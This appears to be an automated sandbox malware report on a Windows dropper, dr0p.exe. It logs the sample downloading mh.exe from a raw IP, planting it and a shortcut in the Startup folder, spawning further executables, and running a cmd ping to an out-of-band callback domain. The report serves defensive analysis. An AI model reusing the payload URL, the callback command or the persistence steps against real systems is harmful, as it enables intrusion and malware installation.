Source: C:\Users\user\Desktop\dr0p.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\q.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\hm.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\hm.exeSection loaded: opencl.dllJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: chrome.lnk.3.drLNK file: ..\..\..\..\..\..\..\Desktop\mh1.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeFile written: C:\Users\user\Desktop\poolworker.config.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: mh.exe, 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe, 00000003.00000000.2155289932.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmp, mh.exe.0.dr
Source: dr0p.exeStatic PE information: 0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6005187Jump to behavior
Source: mh.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1e04ab
Source: q.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x22ef6
Source: dr0p.exeStatic PE information: real checksum: 0xc3e77c5a should be: 0x5a1f
Source: hm.exe.3.drStatic PE information: real checksum: 0x3f27e7 should be: 0x3edda5
Source: mh.exe.0.drStatic PE information: section name: .didat
Source: mh.exe.0.drStatic PE information: section name: _RDATA
Source: hm.exe.3.drStatic PE information: section name: .xdata
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED5166 push rsi; retf 3_2_00007FF741ED5167
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED5156 push rsi; retf 3_2_00007FF741ED5157
Source: C:\Users\user\Desktop\dr0p.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeFile created: C:\Users\user\Desktop\hm.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeFile created: C:\Users\user\Desktop\q.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\dr0p.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeJump to dropped file
Source: C:\Users\user\Desktop\dr0p.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnkJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\dr0p.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EBB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741EA40BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ECFCA0 FindFirstFileExA,3_2_00007FF741ECFCA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC16A4 VirtualQuery,GetSystemInfo,3_2_00007FF741EC16A4
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: dr0p.exe, 00000000.00000003.2154650025.0000000005883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dr0p.exe, 00000000.00000003.2154650025.0000000005883000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000002.2162499969.0000000005883000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000003.2154650025.000000000586C000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000002.2162499969.000000000586C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: dr0p.exe, 00000000.00000003.2154650025.00000000058A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD0o
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF741EC3170
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED0D20 GetProcessHeap,3_2_00007FF741ED0D20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF741EC3170
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF741EC2510
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC3354 SetUnhandledExceptionFilter,3_2_00007FF741EC3354
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF741EC76D8
Source: C:\Users\user\Desktop\dr0p.exeCode function: 0_2_00420000 LoadLibraryA,InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,0_2_00420000
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe" Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.funJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeProcess created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.funJump to behavior
Source: C:\Users\user\Desktop\q.exeProcess created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741ED58E0 cpuid 3_2_00007FF741ED58E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF741EBA2CC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EC0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF741EC0754
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exeCode function: 3_2_00007FF741EA51A4 GetVersionExW,3_2_00007FF741EA51A4

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\dr0p.exeDownload & Execute: InternetReadFile,WriteFile,ShellExecutegraph_0-43
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
12
Registry Run Keys / Startup Folder
1
Exploitation for Privilege Escalation
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
11
Process Injection
11
Process Injection
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
Registry Run Keys / Startup Folder
1
Obfuscated Files or Information
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Software Packing
NTDS1
System Network Configuration Discovery
Distributed Component Object ModelInput Capture21
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets4
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials24
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584651 Sample: dr0p.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 72 43 Multi AV Scanner detection for dropped file 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Machine Learning detection for sample 2->47 9 dr0p.exe 2 2->9         started        process3 dnsIp4 39 23.27.51.244, 49709, 80 EGIHOSTINGUS United States 9->39 33 C:\Users\user\AppData\Roaming\...\mh.exe, PE32+ 9->33 dropped 51 Drops PE files to the startup folder 9->51 53 Found API chain with Download & Execute functionality 9->53 14 mh.exe 18 9->14         started        17 cmd.exe 1 9->17         started        file5 signatures6 process7 file8 35 C:\Users\user\Desktop\q.exe, PE32 14->35 dropped 37 C:\Users\user\Desktop\hm.exe, PE32+ 14->37 dropped 20 q.exe 2 14->20         started        41 Uses ping.exe to check the status of other devices and networks 17->41 22 conhost.exe 17->22         started        24 PING.EXE 1 17->24         started        signatures9 process10 process11 26 hm.exe 1 20->26         started        29 conhost.exe 20->29         started        signatures12 49 Multi AV Scanner detection for dropped file 26->49 31 conhost.exe 26->31         started        process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
dr0p.exe18%VirustotalBrowse
dr0p.exe24%ReversingLabsWin32.Trojan.Crysant
dr0p.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe43%ReversingLabsWin64.Trojan.Generic
C:\Users\user\Desktop\hm.exe29%ReversingLabsWin64.PUA.Generic
C:\Users\user\Desktop\q.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://23.27.51.244/mh.exe/c0%Avira URL Cloudsafe
http://23.27.51.244/mh.exe0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://23.27.51.244/mh.exefalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://23.27.51.244/mh.exe/cdr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
23.27.51.244
unknownUnited States
18779EGIHOSTINGUSfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584651
Start date and time:2025-01-06 06:03:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:dr0p.exe
Detection:MAL
Classification:mal72.troj.adwa.winEXE@14/6@0/1
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 73
  • Number of non-executed functions: 93
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target hm.exe, PID 5788 because there are no executed function
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
TimeTypeDescription
06:03:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
06:04:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
EGIHOSTINGUSarmv6l.elfGet hashmaliciousUnknownBrowse
  • 136.0.151.194
2.elfGet hashmaliciousUnknownBrowse
  • 107.164.241.37
31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
  • 192.177.167.92
botx.arm7.elfGet hashmaliciousMiraiBrowse
  • 166.88.83.119
spc.elfGet hashmaliciousMirai, MoobotBrowse
  • 104.253.169.92
loligang.spc.elfGet hashmaliciousMiraiBrowse
  • 45.38.212.251
nabspc.elfGet hashmaliciousUnknownBrowse
  • 142.252.146.175
arm7.elfGet hashmaliciousUnknownBrowse
  • 142.253.14.137
arm.elfGet hashmaliciousUnknownBrowse
  • 45.39.118.81
file.exeGet hashmaliciousFormBookBrowse
  • 45.38.60.47
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\Desktop\hm.exex11.exeGet hashmaliciousUnknownBrowse
    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
    Category:dropped
    Size (bytes):778
    Entropy (8bit):3.112954459257533
    Encrypted:false
    SSDEEP:12:8wl0dRsX2lw/GXzUQe+gpbDEa4t2YZ/elFlSJm:8YTeIQel1DLqy
    MD5:B74F9BBD71D91F827484B532D81043B5
    SHA1:F050DAB19C664390E38DC40F3BD30A708AFF352D
    SHA-256:217F9930F97432CAD7283E0DE7B35D1AD6F95E7612FC4D9466E22CA1B56B33C9
    SHA-512:184C9B582689EDAF340D0FDDDFD2EABF68DDCE49FB220970B1B3F466EC4CA91226955B3507B44E0802DD355395B17848B02D350255F42D93879A909A46B091A1
    Malicious:false
    Reputation:low
    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........Desktop.@............................................D.e.s.k.t.o.p.....V.2...........mh1.exe.@............................................m.h.1...e.x.e.......$.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.m.h.1...e.x.e...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.e.s.k.t.o.p.........:..,.LB.)...A-...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
    Process:C:\Users\user\Desktop\dr0p.exe
    File Type:PE32+ executable (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):1916354
